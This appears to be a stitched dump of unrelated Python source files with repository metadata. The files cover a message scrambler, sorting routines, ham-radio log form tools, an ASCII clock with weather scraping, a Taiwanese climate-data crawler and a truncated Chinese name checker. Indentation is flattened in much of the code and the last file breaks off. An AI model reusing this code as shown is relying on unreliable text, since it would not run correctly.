or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
message_array = remove_spaces_and_make_double_array(message, spaces)
message_array = flip_horizontally(message_array)
final_message = []
height = len(message_array)
width = len(message_array[0])
for x in range(width - 1):
increment = height - 1
while True:
next_array = message_array[increment - 1]
current_array = message_array[increment]
final_message += current_array[-1]
current_array.pop(-1)
if len(next_array) == len(current_array) + 1 or increment == 0:
break
else:
increment -= 1
for x in range(len(message_array) - 1, -1, -1):
for y in range(x, x - width, -1):
try:
final_message += message_array[y][-1]
message_array[y].pop(-1)
            except IndexError:
break
printed_string = "".join(final_message[::-1]) # .strip()
return printed_string
def BR_south_east_diagonal(message, width=12, height=19, spaces=2):
if not (isinstance(message, str) and isinstance(width, int) \
            and isinstance(height, int) and isinstance(spaces, int)) \
or width < 0 or height < 0 or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
empty_array = ["" for x in range(height)]
message_increment, begin = 0, 0
if height * width > len(message):
repeat = len(message)
else:
repeat = height + width
for x in range(repeat):
if x > width:
begin += 1
for y in range(begin, x):
if y == height or message_increment > len(message) - 1:
break
else:
empty_array[y] += " " * spaces + message[message_increment]
message_increment += 1
consistant_array = make_consistant(empty_array, width, spaces)
consistant_array = flip_vertically(consistant_array)
flipped_array = flip_horizontally(consistant_array)
printed_array = "".join(flipped_array)
return printed_array
def BR_south_east_diagonal_revert(message, spaces=2):
if not (isinstance(message, str) and isinstance(spaces, int)) \
or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
message_array = remove_spaces_and_make_double_array(message, spaces)
message_array = flip_vertically(message_array)
message_array = flip_horizontally(message_array)
final_message = []
height = len(message_array)
width = len(message_array[0])
for x in range(width - 1):
increment = height - 1
while True:
next_array = message_array[increment - 1]
current_array = message_array[increment]
final_message += current_array[-1]
current_array.pop(-1)
if len(next_array) == len(current_array) + 1 or increment == 0:
break
else:
increment -= 1
for x in range(len(message_array) - 1, -1, -1):
for y in range(x, x - width, -1):
try:
final_message += message_array[y][-1]
message_array[y].pop(-1)
            except IndexError:
break
printed_string = "".join(final_message[::-1]) # .strip()
return printed_string
# _____________________________________________________
def make_random_string(length):
all_char = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUV' \
'WXYZ 1234567890"\'^[]<>{}\\/|;:.,~!?@#$%=&*()°€¥£-_+')
shuffle(all_char)
return all_char[:length]
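# Note: despite its name, make_random_string returns a *list* of `length` unique shuffled
# characters; the callers below only slice it (dict_chars[:16] / dict_chars[16:]), so a list works.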
def the_most_insane_encoder(message, **kwargs):
switches = kwargs.get("switches", 10)
dict_chars = kwargs.get("encoding_dict", None)
order_of_encoding = kwargs.get("order_of_encoding", None)
mode = kwargs.get("mode", " ")
height = kwargs.get("height", 10)
width = kwargs.get("width", 10)
encoders = [BL_left_right_horizontal,
BL_south_east_diagonal,
BL_south_west_diagonal,
BL_top_up_vertical,
BR_right_left_horizontal,
BR_south_east_diagonal,
BR_south_west_diagonal,
BR_top_up_vertical,
TL_left_right_horizontal_v2,
TL_north_east_diagonal,
TL_south_west_diagonal,
TL_top_down_vertical,
TR_right_left_horizontal,
TR_north_west_diagonal,
TR_south_east_diagonal,
TR_top_down_vertical]
decoders = [BL_left_right_horizontal_revert,
BL_south_east_diagonal_revert,
BL_south_west_diagonal_revert,
BL_top_up_vertical_revert,
BR_right_left_horizontal_revert,
BR_south_east_diagonal_revert,
BR_south_west_diagonal_revert,
BR_top_up_vertical_revert,
TL_left_right_horizontal_revert,
TL_north_east_diagonal_revert,
TL_south_west_diagonal_revert,
TL_top_down_vertical_revert,
TR_right_left_horizontal_revert,
TR_north_west_diagonal_revert,
TR_south_east_diagonal_revert,
TR_top_down_vertical_revert]
if dict_chars is None:
dict_chars = make_random_string(32)
first_sixteen = dict_chars[:16]
last_sixteen = dict_chars[16:]
elif len(dict_chars) != 32:
print("You need exactly 32 characters to make your own dictionary!")
return
else:
first_sixteen = dict_chars[:16]
last_sixteen = dict_chars[16:]
encoding_dict = dict(zip(first_sixteen, encoders))
decoding_dict = dict(zip(last_sixteen, decoders))
if order_of_encoding is None:
if switches % 2 == 1:
order_of_encoding = "".join(choice(first_sixteen) if not x % 2 else choice(last_sixteen)
for x in range(switches))
else:
reverts_needed = int(switches / 2)
order_of_encoding = "".join(map(lambda x: "".join(x), zip(choices(first_sixteen, k=reverts_needed),
choices(last_sixteen, k=reverts_needed))))
else:
encodes = [order_of_encoding[x] for x in range(0, len(order_of_encoding),2)]
decodes = [order_of_encoding[x] for x in range(1, len(order_of_encoding),2)]
if any(encode not in encoding_dict for encode in encodes) or \
any(decode not in decoding_dict for decode in decodes):
print("Something's wrong with your order of encoding")
return
len_message = len(message)
print(f"len message {len_message}")
if mode == "numbers":
message = ",".join(str(ord(letter)) for letter in message) + ","
space_left = (height * width) - len(message)
commas_needed = int(space_left / 5)
numbers_needed = int(space_left * (4 / 5))
numbers_needed += (height * width) - (numbers_needed + commas_needed + len(message))
min_x_num_digits = int("1" + "0" * (numbers_needed - 1))
max_x_num_digits = int("9" * numbers_needed)
thing = list(str(randrange(min_x_num_digits, max_x_num_digits))) + list("," * commas_needed)
shuffle(thing)
message += "".join(thing)
else:
characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUV' \
'WXYZ 1234567890"\'^[]<>{}\\/|;:.,~!?@#$%=&*()°€¥£-_+'
message += "".join(choices(characters, k=(height * width)))
for x, letter in enumerate(order_of_encoding):
if x % 2 == 0:
message = encoding_dict[letter](message, height=height, width=width, spaces=0)
else:
message = decoding_dict[letter](message, spaces=0)
return message, order_of_encoding, dict_chars, len_message
def the_most_insane_decoder(message, dict_chars, order_of_encoding, len_message, **kwargs):
height = kwargs.get("height", 10)
width = kwargs.get("width", 10)
mode = kwargs.get("mode", "")
encoders = [ BL_left_right_horizontal,
BL_south_east_diagonal,
BL_south_west_diagonal,
BL_top_up_vertical,
BR_right_left_horizontal,
BR_south_east_diagonal,
BR_south_west_diagonal,
BR_top_up_vertical,
TL_left_right_horizontal_v2,
TL_north_east_diagonal,
TL_south_west_diagonal,
TL_top_down_vertical,
TR_right_left_horizontal,
TR_north_west_diagonal,
TR_south_east_diagonal,
TR_top_down_vertical ]
decoders = [ BL_left_right_horizontal_revert,
BL_south_east_diagonal_revert,
BL_south_west_diagonal_revert,
BL_top_up_vertical_revert,
BR_right_left_horizontal_revert,
BR_south_east_diagonal_revert,
BR_south_west_diagonal_revert,
BR_top_up_vertical_revert,
TL_left_right_horizontal_revert,
TL_north_east_diagonal_revert,
TL_south_west_diagonal_revert,
TL_top_down_vertical_revert,
TR_right_left_horizontal_revert,
TR_north_west_diagonal_revert,
TR_south_east_diagonal_revert,
TR_top_down_vertical_revert ]
opposite_dict = dict(zip(decoders + encoders, encoders + decoders))
first_sixteen = dict_chars[:16]
last_sixteen = dict_chars[16:]
encoding_dict = dict(zip(first_sixteen, encoders))
decoding_dict = dict(zip(last_sixteen, decoders))
result = int(order_of_encoding[0] in encoding_dict)
for x, letter in enumerate(order_of_encoding[::-1]):
if x % 2 == result:
message = opposite_dict[encoding_dict[letter]](message, spaces=0)
else:
message = opposite_dict[decoding_dict[letter]](message, height=height, width=width, spaces=0)
if mode == 'numbers':
message = "".join(chr(int(number)) for number in message.split(',')[:len_message])
# message = "".join(map(lambda x: chr(int(x)), message.split(',')[:len_message]))
else:
message = message[:len_message]
return message
# OPTIONS:_______________________________________________________________________
message = "Somebody once told me the world was gonna roll me I ain't the sharpest tool" \
" in the shed She was looking kind of dumb with her finger and her thumb"
success = 0
height = 30
width = 30
mode = "numbers"
spaces = 2
switch_amount = 10
# _______________________________________________________________________________
encoded_message, encoding_list, thirty_two_chars, len_message = the_most_insane_encoder \
(message, switches=switch_amount, height=height, width=width, mode=mode)
print(f"scrambled message : \n{encoded_message}"
f"\norder of encoding : {encoding_list}"
f"\ndict chars : {thirty_two_chars}")
decoded_message = the_most_insane_decoder \
(encoded_message, thirty_two_chars, encoding_list, len_message, height=height, width=width, mode=mode)
print(f"decoded message : {decoded_message.strip()}")
``` |
{
"source": "Ji19283756/sorting_stuff",
"score": 4
} |
#### File: Ji19283756/sorting_stuff/no_bool_bubble_sort.py
```python
def no_bool_bubble_sort(unsorted_list):
    for y in range(1, len(unsorted_list)):  # n - 1 passes are needed in the worst case
for x in range(len(unsorted_list) - y):
try:
value = \
(((unsorted_list[x] - unsorted_list[x + 1]) // abs(
unsorted_list[x + 1] - unsorted_list[x])) + 1) // 2
unsorted_list[x], unsorted_list[x + 1] = unsorted_list[x + value], unsorted_list[x + 1 - value]
except ZeroDivisionError:
pass
return unsorted_list
```
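The sort above avoids any boolean comparison by turning the sign of the difference between
neighbours into a swap offset: for integers `a` and `b`, `((a - b) // abs(b - a) + 1) // 2`
evaluates to `1` when `a > b` and to `0` when `a < b`, while equal elements raise
`ZeroDivisionError` and are left in place. A small sketch of that identity and of calling the
function (the helper name `swap_offset` is illustrative, not part of the original file):

```python
def swap_offset(a, b):
    # 1 if a > b, 0 if a < b; raises ZeroDivisionError when a == b
    return ((a - b) // abs(b - a) + 1) // 2

assert swap_offset(5, 3) == 1
assert swap_offset(3, 5) == 0

print(no_bool_bubble_sort([4, 1, 3, 2]))  # expected: [1, 2, 3, 4]
```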
#### File: Ji19283756/sorting_stuff/python_quicksort.py
```python
from random import shuffle, randrange
def quicksort_pass(temp_list):
if len(temp_list) == 1:
return temp_list
pivot_point = temp_list[randrange(0, len(temp_list) - 1)]
same_as_pivot = [pivot_point]
temp_list.remove(pivot_point)
less_than_pivot = []
more_than_pivot = []
for value in temp_list:
if value < pivot_point:
less_than_pivot += [value]
elif value > pivot_point:
more_than_pivot += [value]
elif value == pivot_point:
same_as_pivot += [value]
if len(less_than_pivot) > 1:
less_than_pivot = quicksort_pass(less_than_pivot)
if len(more_than_pivot) > 1:
more_than_pivot = quicksort_pass(more_than_pivot)
return less_than_pivot + same_as_pivot + more_than_pivot
thing = list(range(100))
shuffle(thing)
print(quicksort_pass(thing))
``` |
{
"source": "JI1FLB/N1MM-Logger-ADIF-to-HL-convertor",
"score": 3
} |
#### File: JI1FLB/N1MM-Logger-ADIF-to-HL-convertor/Phase0.py
```python
def phase0():
#------------------------------
#
    # Create the JARL summary sheet
    #
    # Spec: convert the fill-in form into the summary format
import os
fill_in_form = open( "form.txt" ,"r", encoding='utf-8')
Callsign =""
# GestOP_Callsign =""
# GestOP_flag = "N"
# Multi_OP_flag = "N"
# FD_flag ="N"
# yesno = "N"
# okng = True
# FD_coe = 1
Ph0 = []
#----------------------------------------------------------------------
print("\n")
print("*** サマリーシート必要事項選択")
print("\n")
#------------------------------------------------------------------------
#
    # Get the callsign
    # Build the summary sheet
#
fill_in = fill_in_form.readlines()
for fill in fill_in :
fill = fill.rstrip('\n')
fill = fill.strip()
fill = fill.split(":")
if "コールサイン"==fill[0] :
Callsign = fill[1]
Callsign = Callsign.lstrip().rstrip()
Ph0.append(Callsign)
break
fill_in_form.close()
return Ph0
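# Illustrative note (the form.txt layout is inferred from the parsing above, not from project docs):
# a line such as "コールサイン:JA1XYZ" makes phase0() return ['JA1XYZ'] (the callsign is hypothetical).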
``` |
{
"source": "JI1FLB/N1MM-Logger-ADIF-to-JARL-contest-log-rev3",
"score": 4
} |
#### File: JI1FLB/N1MM-Logger-ADIF-to-JARL-contest-log-rev3/form_viewer.py
```python
def form_viewer() :
import tkinter as tk
import os
# Main windows
editor = tk.Tk()
editor.title('form file Viewer')
def open_form() :
fill_in_form = open( "form.txt" ,"r", encoding='utf-8')
fill_in = fill_in_form.readlines()
for fill in fill_in :
fill = fill.lstrip('[')
fill = fill.lstrip()
fill = fill.rstrip(']')
fill = fill.rstrip()
text_widget.insert('end',fill+'\n')
fill_in_form.close()
def save_form() :
        # Add a backup of the form.txt file here.
save_form = text_widget.get('1.0','end -1c')
fill_in_form_new = open( "form.txt" ,"w", encoding='utf-8')
fill_in_form_new.write( save_form )
fill_in_form_new.close()
        # Clear the displayed text
text_widget.delete('1.0','end')
def close_disp() :
editor.destroy()
text_widget = tk.Text(editor)
text_widget.grid(column = 0, row = 0, sticky = (tk.N, tk.S, tk.E, tk.W))
editor.columnconfigure(0, weight = 1)
editor.rowconfigure(0, weight = 1)
    # Create the menu bar
men = tk.Menu(editor)
    # Attach the menu bar to the window
editor.config(menu=men)
    # Create the parent menu (File) on the menu bar
menu_file = tk.Menu(editor)
men.add_cascade(label='ファイル', menu=menu_file)
    # Add the child menu items (Open / Save / Close) to the parent menu
menu_file.add_command(label='Open', command=open_form)
menu_file.add_separator()
menu_file.add_command(label='Save', command=save_form)
menu_file.add_separator()
menu_file.add_command(label='close', command=close_disp)
editor.mainloop()
``` |
{
"source": "ji24601/ascii_clock_v1.0",
"score": 3
} |
#### File: ji24601/ascii_clock_v1.0/digital.py
```python
import os
import time
import math
import datetime
import keyboard
from asciicanvas import AsciiCanvas
from weather import get_weather
import calendar
from colorama import init, Fore, Back, Style
init(autoreset=True)
x_scale_ratio = 1.75
location, temperature = get_weather()
t=time.localtime()
Y=int(t.tm_year)
M=int(t.tm_mon)
todays = int(t.tm_mday)
startday = 0
lastday = 0
keys = [
"down arrow",
"up arrow",
"left arrow",
"right arrow",
"enter",
"<",
">",
"[",
"]"
]
line1={1:" []", 2:"[][][][][]", 3:"[][][][][]", 4:"[] []", 5:"[][][][][]", 6:"[][][][][]", 7:"[][][][][]", 8:"[][][][][]", 9:"[][][][][]", 0:"[][][][][]"}
line2={1:" []", 2:" []", 3:" []", 4:"[] []", 5:"[] ", 6:"[] ", 7:" []", 8:"[] []", 9:"[] []", 0:"[] []"}
line3={1:" []", 2:" []", 3:" []", 4:"[] []", 5:"[] ", 6:"[] ", 7:" []", 8:"[] []", 9:"[] []", 0:"[] []"}
line4={1:" []", 2:" []", 3:" []", 4:"[] []", 5:"[] ", 6:"[] ", 7:" []", 8:"[] []", 9:"[] []", 0:"[] []"}
line5={1:" []", 2:"[][][][][]", 3:"[][][][][]", 4:"[][][][][]", 5:"[][][][][]", 6:"[][][][][]", 7:" []", 8:"[][][][][]", 9:"[][][][][]", 0:"[] []"}
line6={1:" []", 2:"[] ", 3:" []", 4:" []", 5:" []", 6:"[] []", 7:" []", 8:"[] []", 9:" []", 0:"[] []"}
line7={1:" []", 2:"[] ", 3:" []", 4:" []", 5:" []", 6:"[] []", 7:" []", 8:"[] []", 9:" []", 0:"[] []"}
line8={1:" []", 2:"[] ", 3:" []", 4:" []", 5:" []", 6:"[] []", 7:" []", 8:"[] []", 9:" []", 0:"[] []"}
line9={1:" []", 2:"[][][][][]", 3:"[][][][][]", 4:" []", 5:"[][][][][]", 6:"[][][][][]", 7:" []", 8:"[][][][][]", 9:"[][][][][]", 0:"[][][][][]"}
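# Each digit 0-9 is drawn as a 9-row block of "[]" segments: lineN[d] holds row N of digit d,
# so stacking line1..line9 for the same key renders that digit (used by the draw_digital_*_hand helpers below).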
def draw_digital_second_hand(ascii_canvas, x, y, sec):
"""
Draw second hand
"""
ascii_canvas.add_text(x, y + 0, line1[sec//10] + " " + line1[sec%10]);
ascii_canvas.add_text(x, y + 1, line2[sec//10] + " " + line2[sec%10]);
ascii_canvas.add_text(x, y + 2, line3[sec//10] + " " + line3[sec%10]);
ascii_canvas.add_text(x, y + 3, line4[sec//10] + " " + line4[sec%10]);
ascii_canvas.add_text(x, y + 4, line5[sec//10] + " " + line5[sec%10]);
ascii_canvas.add_text(x, y + 5, line6[sec//10] + " " + line6[sec%10]);
ascii_canvas.add_text(x, y + 6, line7[sec//10] + " " + line7[sec%10]);
ascii_canvas.add_text(x, y + 7, line8[sec//10] + " " + line8[sec%10]);
ascii_canvas.add_text(x, y + 8, line9[sec//10] + " " + line9[sec%10]);
def draw_digital_minute_hand(ascii_canvas, x, y, min):
"""
Draw minute hand
"""
ascii_canvas.add_text(x, y + 0, line1[min//10] + " " + line1[min%10] + " ");
ascii_canvas.add_text(x, y + 1, line2[min//10] + " " + line2[min%10] + " ");
ascii_canvas.add_text(x, y + 2, line3[min//10] + " " + line3[min%10] + " ");
ascii_canvas.add_text(x, y + 3, line4[min//10] + " " + line4[min%10] + " ");
ascii_canvas.add_text(x, y + 4, line5[min//10] + " " + line5[min%10] + " ");
ascii_canvas.add_text(x, y + 5, line6[min//10] + " " + line6[min%10] + " ");
ascii_canvas.add_text(x, y + 6, line7[min//10] + " " + line7[min%10] + " ");
ascii_canvas.add_text(x, y + 7, line8[min//10] + " " + line8[min%10] + " ");
ascii_canvas.add_text(x, y + 8, line9[min//10] + " " + line9[min%10] + " ");
def draw_digital_hour_hand(ascii_canvas, x, y, hour):
"""
Draw hour hand
"""
ascii_canvas.add_text(x, y + 0, line1[hour//10] + " " + line1[hour%10] + " ");
ascii_canvas.add_text(x, y + 1, line2[hour//10] + " " + line2[hour%10] + " ");
ascii_canvas.add_text(x, y + 2, line3[hour//10] + " " + line3[hour%10] + " ");
ascii_canvas.add_text(x, y + 3, line4[hour//10] + " " + line4[hour%10] + " ");
ascii_canvas.add_text(x, y + 4, line5[hour//10] + " " + line5[hour%10] + " ");
ascii_canvas.add_text(x, y + 5, line6[hour//10] + " " + line6[hour%10] + " ");
ascii_canvas.add_text(x, y + 6, line7[hour//10] + " " + line7[hour%10] + " ");
ascii_canvas.add_text(x, y + 7, line8[hour//10] + " " + line8[hour%10] + " ");
ascii_canvas.add_text(x, y + 8, line9[hour//10] + " " + line9[hour%10] + " ");
def draw_digital_calendar(ascii_canvas, startday, lastday, today):
x, y = 79, 22
ascii_canvas.add_text(x, y, Back.RED + Fore.WHITE + '[' + str(Y) + '/' + str(M).rjust(2, '0') + '/' + str(todays).rjust(2, '0') + ']' + Fore.WHITE)
x, y = 71, 23
ascii_canvas.add_text(x, y, '----------------------------')
x, y = 71, 24
ascii_canvas.add_text(x, y, Fore.RED + ' Sun' + Fore.WHITE + ' Mon Tue Wed Thu Fri ' + Fore.CYAN + 'Sat' + Fore.WHITE)
y = y + 1
if startday == 6:
s = 1
else:
s = startday + 2
c = 0
m = 0
msg = ''
for k in range(6):
for i in range(7):
c = c + 1
if c < s:
x = x + 4
# ascii_canvas.add_text(x, y, ' '.center(4, ' '))
else:
if lastday > m:
m = m + 1
if m == today:
msg = msg + ' ' + Fore.GREEN + str(m).rjust(2, ' ')
elif (c - 1) % 7 == 0:
msg = msg + Fore.RED + str(m).rjust(4, ' ')
# ascii_canvas.add_text(x, y, Fore.RED + str(m).rjust(3, ' ') + Fore.WHITE)
elif c % 7 == 0:
msg = msg + Fore.CYAN + str(m).rjust(4, ' ')
# ascii_canvas.add_text(x, y, Fore.CYAN + str(m).rjust(3, ' ') + Fore.WHITE)
else:
msg = msg + Fore.WHITE + str(m).rjust(4, ' ')
# ascii_canvas.add_text(x, y, str(m).rjust(3, ' '))
# x = x + 3
ascii_canvas.add_text(x, y, msg + Fore.WHITE)
msg = ''
y = y + 1
if k % 2 == 0:
x = 70
else:
x = 71
def draw_digital_clock(cols, lines):
"""
Draw clock
"""
if cols < 25 or lines < 25:
print('Too little columns/lines for print out the clock!')
exit()
# create ascii canvas for clock and eval vars
ascii_canvas = AsciiCanvas(cols * 2, lines)
# add clock region and clock face
now = datetime.datetime.now()
ascii_canvas.add_rect(27, 2, 86, 15)
# add clock hands
x, y = int(math.ceil(ascii_canvas.cols / 4.0)) - 4, 5
draw_digital_hour_hand(ascii_canvas, x, y, now.hour)
x = x + 25
draw_digital_minute_hand(ascii_canvas, x, y, now.minute)
x = x + 25
draw_digital_second_hand(ascii_canvas, x, y, now.second)
# draw weather
global location
global temperature
ascii_canvas.add_text(17, 18, 'ooooooooooooooooooooooooooooooooooooooooooooooooo')
ascii_canvas.add_text(17, 19, 'o o')
ascii_canvas.add_text(17, 20, 'o ' + location + ' ' + temperature + '\" o')
ascii_canvas.add_text(17, 21, 'o o')
ascii_canvas.add_text(17, 22, 'ooooooooooooooooooooooooooooooooooooooooooooooooo')
# draw calendar
global todays
global lastday
global startday
global Y
global M
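    # startday / lastday are used below as (weekday index of day 1, number of days in the month);
    # draw_digital_calendar treats startday == 6 as the month starting on a Sunday.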
startday, lastday = calendar.calendar(Y, M)
draw_digital_calendar(ascii_canvas, startday, lastday, todays)
#draw info
y = 24
ascii_canvas.add_text(17, y, '<Infomation>')
ascii_canvas.add_text(17, y + 2, ' [ key: year - 1')
ascii_canvas.add_text(17, y + 4, ' ] key: year + 1')
ascii_canvas.add_text(17, y + 6, ' < key: month - 1')
ascii_canvas.add_text(17, y + 8, ' > key: month + 1')
ascii_canvas.add_text(17, y + 10, 'enter key: go memo')
ascii_canvas.add_text(39, y + 2, '|')
ascii_canvas.add_text(39, y + 3, '|')
ascii_canvas.add_text(39, y + 4, '|')
ascii_canvas.add_text(39, y + 5, '|')
ascii_canvas.add_text(39, y + 6, '|')
ascii_canvas.add_text(39, y + 7, '|')
ascii_canvas.add_text(39, y + 8, '|')
ascii_canvas.add_text(39, y + 9, '|')
ascii_canvas.add_text(39, y + 10, '|')
ascii_canvas.add_text(41, y + 2, ' → key: day + 1')
ascii_canvas.add_text(41, y + 4, ' ← key: day - 1')
ascii_canvas.add_text(41, y + 6, ' ↑ key: day - 7')
ascii_canvas.add_text(41, y + 8, ' ↓ key: day + 7')
ascii_canvas.add_text(41, y + 10, 'slash key: change clock')
#draw change mode
x, y = 73, 19
ascii_canvas.add_text(x, y, '[v] Analog')
x, y = 103, 19
ascii_canvas.add_text(x, y, Style.BRIGHT + Fore.YELLOW + '[v] Digital' + Style.DIM)
# print out canvas
ascii_canvas.print_out()
def main():
global todays
global lastday
global Y
global M
lines = 40
cols = int(lines * x_scale_ratio)
# set console window size and screen buffer size
if os.name == 'nt':
os.system('mode con: cols=%s lines=%s' % (cols * 2 + 1, lines + 1))
while True:
try:
# for key in keys:
# if keyboard.is_pressed(key):
# print(keyboard.key_to_scan_codes(key))
# print(f"{key} pressed")
if keyboard.is_pressed('esc'):
                print("esc pressed")
break
elif keyboard.is_pressed('left arrow'):
todays = todays - 1
if todays < 1:
todays = 1
time.sleep(0.1)
elif keyboard.is_pressed('right arrow'):
todays = todays + 1
if lastday < todays:
todays = lastday
time.sleep(0.1)
elif keyboard.is_pressed('up arrow'):
todays = todays - 7
if todays < 1:
todays = 1
time.sleep(0.1)
elif keyboard.is_pressed('down arrow'):
todays = todays + 7
if lastday < todays:
todays = lastday
time.sleep(0.1)
elif keyboard.is_pressed('['):
M = M - 1
time.sleep(0.1)
elif keyboard.is_pressed(']'):
M = M + 1
time.sleep(0.1)
elif keyboard.is_pressed('<'):
Y = Y - 1
time.sleep(0.1)
elif keyboard.is_pressed('>'):
Y = Y + 1
time.sleep(0.1)
#elif keyboard.is_pressed('enter'):
#time.sleep(0.1)
except:
print('except')
break
os.system('cls' if os.name == 'nt' else 'clear')
draw_digital_clock(cols, lines)
time.sleep(0.2)
if __name__ == '__main__':
main()
```
#### File: ji24601/ascii_clock_v1.0/weather.py
```python
from urllib.request import urlopen, Request
import urllib
import bs4
from asciicanvas import AsciiCanvas
def get_weather():
enc_location = urllib.parse.quote('날씨')
url = 'https://search.naver.com/search.naver?ie=utf8&query='+ enc_location
req = Request(url)
page = urlopen(req)
html = page.read()
soup = bs4.BeautifulSoup(html,'html5lib')
location = soup.find('div', class_='weather_box').find('em').text
temperature = soup.find('p', class_='info_temperature').find('span', class_='todaytemp').text
enc_location = urllib.parse.quote('영어로+' + location)
url = 'https://search.naver.com/search.naver?ie=utf8&query='+ enc_location
req = Request(url)
page = urlopen(req)
html = page.read()
soup = bs4.BeautifulSoup(html,'html5lib')
en_location = soup.find('div', class_='sentence en').find('strong').text
en_location = en_location.replace(' 전체듣기', '')
return en_location , temperature
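# Example usage (network access and the current Naver page layout required):
#   location, temperature = get_weather()   # e.g. ("Seoul", "3"); actual values depend on the live page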
# print('ㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁ')
# print('ㅁ ㅁ')
# print('ㅁ 현재 ' + en_location + ' 날씨는 ' + temperature + '도 입니다. ㅁ')
# print('ㅁ ㅁ')
# print('ㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁㅁ')
``` |
{
"source": "ji3g4m6zo6/ins-hashtag-crawler",
"score": 3
} |
#### File: inscrawler/bin/climate_crawler.py
```python
def cdateList(year):
# days31 (1,3,5,7,8,10,12) days30(2,4,6,9,11)
month31=[1,3,5,7,8,10,12]
nday31=range(1,32)
nday30=range(1,31)
day10=['01','02','03','04','05','06','07','08','09']
month12=day10+['10','11','12']
    nday31 = list(map(str, nday31[9:]))
    nday30 = list(map(str, nday30[9:]))
day31 = day10 + nday31
day30 = day10 + nday30
yearData=[]
s=""
for month,strmonth in zip(range(1,13),month12):
if month in month31:
for day in day31:
s = year+'-'+strmonth+'-'+day
yearData.append(s)
else :
for day in day30:
s = year+'-'+strmonth+'-'+day
yearData.append(s)
return yearData
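# Illustrative output: cdateList('2013') yields zero-padded date strings from '2013-01-01' to '2013-12-31'
# (note that every non-31-day month, including February, is given 30 days here).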
# Main crawler function
def crawler(url,station,year,date):
resp = requests.get(url)
soup = BeautifulSoup(resp.text)
# find no data page
error = soup.find(class_="imp").string.encode('utf-8')
if error == '本段時間區間內無觀測資料。':
with open ("./nodata.txt",'a') as f:
f.write(url+'\n')
form =[]
# title
titles = soup.find_all("th")
titles = titles[9:]
strtitle=[]
for title in titles:
title = title.contents
title=title[0]+title[2]+title[4]
strtitle.append(title)
# parameter
soup = soup.tbody
tmps = soup.find_all("tr")
tmps = tmps[2:]
for tmp in tmps:
tmp = tmp.find_all("td")
parameter =[]
for strtmp in tmp:
strtmp = strtmp.string
parameter .append(strtmp)
form.append(parameter)
form = pd.DataFrame(form, columns=strtitle)
form.to_csv("./data/"+station+'/'+year+'/'+date+".csv", encoding ="utf-8")
# sleep(0.5)
# Two logs are kept: nodata.txt and error.txt. nodata.txt lists pages for which the site has no data,
# while error.txt may hold connection failures or missed fetches, so the two are compared and the misses re-crawled.
def errorCrawler():
nodatadirPath = './nodata.txt'
if os.path.exists(nodatadirPath) == 1 :
with open ("./nodata.txt",'r') as f:
nodataUrls = f.readlines()
with open ("./error.txt",'r') as f:
urls = f.readlines()
for url in urls:
url = url.strip()
url = url.split(',')
compareUrl = url[0]+'\n'
            # Check against nodata.txt: if there was never any data for this URL, skip it
if compareUrl in nodataUrls:
pass
else:
try:
sleep(1)
crawler(url[0],url[1],url[2],url[3])
print('again:'+url[1]+','+url[2]+','+url[3])
                    # Record which data were re-crawled on this second pass
with open ("./error_reCrawler.txt",'a') as f:
f.write(url[0]+','+url[1]+','+url[2]+','+url[3]+'\n')
except :
print('error:'+url[1]+','+url[2]+','+url[3])
else:
with open ("./error.txt",'r') as f:
urls = f.readlines()
for url in urls:
url = url.strip()
url = url.split(',')
sleep(1)
print('again:'+url[1]+','+url[2]+','+url[3])
crawler(url[0],url[1],url[2],url[3])
# -*- coding: utf-8 -*-
import os
import requests
import pandas as pd
from time import sleep
from bs4 import BeautifulSoup
# 臺南 (467410) 永康 (467420) 嘉義 (467480) 臺中 (467490) 阿里山 (467530) 新竹 (467571) 恆春 (467590)
# 成功 (467610) 蘭嶼 (467620) 日月潭 (467650) 臺東 (467660) 梧棲 (467770) 七股 (467780) 墾丁 (467790)
# 馬祖 (467990) 新屋 (467050) 板橋 (466880) 淡水 (466900) 鞍部 (466910) 臺北 (466920) 竹子湖 (466930)
# 基隆 (466940) 彭佳嶼 (466950) 花蓮 (466990) 蘇澳 (467060) 宜蘭 (467080) 金門 (467110) 東吉島 (467300)
# 澎湖 (467350) 高雄 (467440) 大武 (467540) 玉山 (467550)
# 新竹 Hsinchu (467571): the real URL uses station 467570; the official site lists it incorrectly
twStationList = ['467410','467420','467480','467490','467530','467570','467590','467610'
,'467620','467650','467660','467770','467780','467790','467990','467050','466880','466900'
,'466910','466920','466930','466940','466950','466990','467060','467080','467110','467300'
,'467350','467440','467540','467550']
# station
for station in twStationList:
# create station folder
dirPath = './data/'+station
if os.path.exists(dirPath) == 0:
os.makedirs(dirPath)
# year
yearList=['2013','2014']
for year in yearList:
dateList = cdateList(year)
# create year folder
dirPath = './data/'+station+'/'+year
if os.path.exists(dirPath) == 0:
os.makedirs(dirPath)
# date
for date in dateList:
# http://e-service.cwb.gov.tw/HistoryDataQuery/DayDataController.do?command=viewMain&station=467410&datepicker=2014-11-26
url="http://e-service.cwb.gov.tw/HistoryDataQuery/DayDataController.do?command=viewMain&station="+station+"&datepicker="+date
try:
print(station+':'+date)
crawler(url,station,year,date)
except:
print(station+':'+date+'error')
with open ("./error.txt",'a') as f:
f.write(url+','+station+','+year+','+date+'\n')
errordirPath = './error.txt'
if os.path.exists(errordirPath) == 1 :
errorCrawler()
``` |
{
"source": "ji3g4m6zo6/JioNLP",
"score": 3
} |
#### File: algorithm/ner/check_person_name.py
```python
import re
from jionlp.rule.rule_pattern import CHINESE_FAMILY_NAME, TWO_CHAR_CHINESE_FAMILY_NAME
class CheckPersonName(object):
""" 给定一个字符串,判断其是否为一个中国人名
原理目前仍非常简陋,即判断该字符串的长度,以及该串首字符是否为姓氏
"""
def __init__(self):
self.chinese_family_name = re.compile(CHINESE_FAMILY_NAME)
self.two_char_chinese_family_name = re.compile(
'(' + TWO_CHAR_CHINESE_FAMILY_NAME + ')')
def __call__(self, text):
text_length = len(text)
        if text_length <= 1:  # not a person name
            return False
        if text_length >= 5:  # not a person name
return False
if text_length == 4:
            # Four-character names cover two cases:
            # 1. a two-character family name, e.g. "欧阳"
if self.chinese_family_name.search(text[0]) is not None \
